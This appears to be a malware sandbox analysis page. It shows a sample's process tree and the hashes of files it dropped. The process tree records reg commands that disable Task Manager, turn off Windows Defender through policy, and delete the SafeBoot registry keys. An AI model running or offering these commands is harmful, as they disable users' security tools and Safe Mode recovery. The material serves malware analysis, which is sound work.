-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableTaskMgr /t REG_DWORD /d 1 /f2⤵PID:2480
-
C:\Windows\system32\reg.exereg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableTaskMgr /t REG_DWORD /d 1 /f3⤵PID:372
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender" /v DisableAntiSpyware /t REG_DWORD /d 1 /f2⤵PID:1924
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender" /v DisableAntiSpyware /t REG_DWORD /d 1 /f3⤵PID:1608
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c reg delete HKEY_CURRENT_USER\System\CurrentControlSet\Control\SafeBoot /va /F2⤵PID:2808
-
C:\Windows\system32\reg.exereg delete HKEY_CURRENT_USER\System\CurrentControlSet\Control\SafeBoot /va /F3⤵PID:3008
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c reg delete HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\SafeBoot /va /F2⤵PID:584
-
C:\Windows\system32\reg.exereg delete HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\SafeBoot /va /F3⤵PID:2944
-
-
Network
MITRE ATT&CK Enterprise v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
144B
MD52d581d7f41be876ce36523d0a7f2a64a
SHA1279f1b7f8936ab44e75bec3695d68569d8bbca9e
SHA25653c9308d8e9a7949f9348038493d87aa1218a148f404a7c340f7d47525ea90dd
SHA5124caf790b2d8feb5b2e9bab0ede191cff81a1547221408255e17e5e549a1fcd3615ea502d6d55b843c50a0eeac0bad13a2261d03f8b580ce6a592298340071c53
-
Filesize
1KB
MD582ea3d2f6fc005352ce69909570def3d
SHA1a43c1be5adc6a957d8a4ed727c3d1d5c648b6397
SHA25656edcf4ec31883a101939b9fb4149d4944f00be0663a4a339afbc0910ea085bc
SHA512197d2e2e5208de3c338ecc383b0fe016c8b5148d476640b6d1a7054f9417e698070edf38376359a26d43a7c6240d0362744f8fd416d46f723d492f230af1a440
-
Filesize
889KB
MD5ecd9d8ef99eb9813fa4eced549ea4d88
SHA17db7bff4ca9e94bbfe026c2282f3ce36e423f183
SHA256fe4547b20cf40de0e33ed545949f3e0dfef815b5add252d233177386910643a6
SHA5122882d1b8ca5654b142e368f2bcb712bf9d8e3e096aacaf5a5f6ffb62b3062df0245db05e13bdc61ab2bd676349c751b87e8880ab034e73d6cd94e29cc165648b
-
Filesize
8B
MD5609261b3d4e430ff93b8c8cdca7be429
SHA1cd2be2be6cab95914147dd192c288b5e43f95d2b
SHA256b5140db3c4d5379b0fbb53d8952b3235297f0c786d4c5a282d8c2b06939252d3
SHA5124d6d383b4ba112f9be8add0b051769852dd219a35f0ec45c407fd8ec54644b1d13f3af4e4d88d4f65c2c88c20916fdff6318b583e9cfb8def1f2d9022334fb2f
-
Filesize
1KB
MD582ea3d2f6fc005352ce69909570def3d
SHA1a43c1be5adc6a957d8a4ed727c3d1d5c648b6397
SHA25656edcf4ec31883a101939b9fb4149d4944f00be0663a4a339afbc0910ea085bc
SHA512197d2e2e5208de3c338ecc383b0fe016c8b5148d476640b6d1a7054f9417e698070edf38376359a26d43a7c6240d0362744f8fd416d46f723d492f230af1a440
-
Filesize
8KB
MD587266b0a2f17c202002a02cdf7a14feb
SHA1c26e1d9d95c6c77383925af484e5fa1bff6b42bb
SHA256a5bb0c2b1712094e6e2572edd0ff859546b6c75b9cf6d4aa87bcca9e5ece110c
SHA512651db30b17b5521a98f88a53a49ebc5527dba0de4d3daadc4fbcc97a536385a18db68dcf190de14579ce3b1e12983e19efb7c5b9c460a5f4fa2b58f83c0ece68
-
Filesize
8KB
MD587266b0a2f17c202002a02cdf7a14feb
SHA1c26e1d9d95c6c77383925af484e5fa1bff6b42bb
SHA256a5bb0c2b1712094e6e2572edd0ff859546b6c75b9cf6d4aa87bcca9e5ece110c
SHA512651db30b17b5521a98f88a53a49ebc5527dba0de4d3daadc4fbcc97a536385a18db68dcf190de14579ce3b1e12983e19efb7c5b9c460a5f4fa2b58f83c0ece68
-
Filesize
8KB
MD587266b0a2f17c202002a02cdf7a14feb
SHA1c26e1d9d95c6c77383925af484e5fa1bff6b42bb
SHA256a5bb0c2b1712094e6e2572edd0ff859546b6c75b9cf6d4aa87bcca9e5ece110c
SHA512651db30b17b5521a98f88a53a49ebc5527dba0de4d3daadc4fbcc97a536385a18db68dcf190de14579ce3b1e12983e19efb7c5b9c460a5f4fa2b58f83c0ece68
-
Filesize
292B
MD54fd17a6fe54d7ef1d007d3bab3ff5fce
SHA14b76934d7e6214db44d83777899bd69db3294435
SHA256402441604ef88d76bbfa022d945514b7b6218997238175ca6c9925d0ad000e6b
SHA512bece45130c568e1d392b08bde6b1dc44b443b6da26f74df4d4ec38f0a53f7b0315eaf1638e1599d947179895e04a1ee0e182b168e33add26492c8175364f20b3
-
Filesize
292B
MD54fd17a6fe54d7ef1d007d3bab3ff5fce
SHA14b76934d7e6214db44d83777899bd69db3294435
SHA256402441604ef88d76bbfa022d945514b7b6218997238175ca6c9925d0ad000e6b
SHA512bece45130c568e1d392b08bde6b1dc44b443b6da26f74df4d4ec38f0a53f7b0315eaf1638e1599d947179895e04a1ee0e182b168e33add26492c8175364f20b3
-
Filesize
889KB
MD5ecd9d8ef99eb9813fa4eced549ea4d88
SHA17db7bff4ca9e94bbfe026c2282f3ce36e423f183
SHA256fe4547b20cf40de0e33ed545949f3e0dfef815b5add252d233177386910643a6
SHA5122882d1b8ca5654b142e368f2bcb712bf9d8e3e096aacaf5a5f6ffb62b3062df0245db05e13bdc61ab2bd676349c751b87e8880ab034e73d6cd94e29cc165648b
-
Filesize
8B
MD5609261b3d4e430ff93b8c8cdca7be429
SHA1cd2be2be6cab95914147dd192c288b5e43f95d2b
SHA256b5140db3c4d5379b0fbb53d8952b3235297f0c786d4c5a282d8c2b06939252d3
SHA5124d6d383b4ba112f9be8add0b051769852dd219a35f0ec45c407fd8ec54644b1d13f3af4e4d88d4f65c2c88c20916fdff6318b583e9cfb8def1f2d9022334fb2f
-
Filesize
8KB
MD587266b0a2f17c202002a02cdf7a14feb
SHA1c26e1d9d95c6c77383925af484e5fa1bff6b42bb
SHA256a5bb0c2b1712094e6e2572edd0ff859546b6c75b9cf6d4aa87bcca9e5ece110c
SHA512651db30b17b5521a98f88a53a49ebc5527dba0de4d3daadc4fbcc97a536385a18db68dcf190de14579ce3b1e12983e19efb7c5b9c460a5f4fa2b58f83c0ece68
-
Filesize
292B
MD54fd17a6fe54d7ef1d007d3bab3ff5fce
SHA14b76934d7e6214db44d83777899bd69db3294435
SHA256402441604ef88d76bbfa022d945514b7b6218997238175ca6c9925d0ad000e6b
SHA512bece45130c568e1d392b08bde6b1dc44b443b6da26f74df4d4ec38f0a53f7b0315eaf1638e1599d947179895e04a1ee0e182b168e33add26492c8175364f20b3
-
Filesize
889KB
MD5ecd9d8ef99eb9813fa4eced549ea4d88
SHA17db7bff4ca9e94bbfe026c2282f3ce36e423f183
SHA256fe4547b20cf40de0e33ed545949f3e0dfef815b5add252d233177386910643a6
SHA5122882d1b8ca5654b142e368f2bcb712bf9d8e3e096aacaf5a5f6ffb62b3062df0245db05e13bdc61ab2bd676349c751b87e8880ab034e73d6cd94e29cc165648b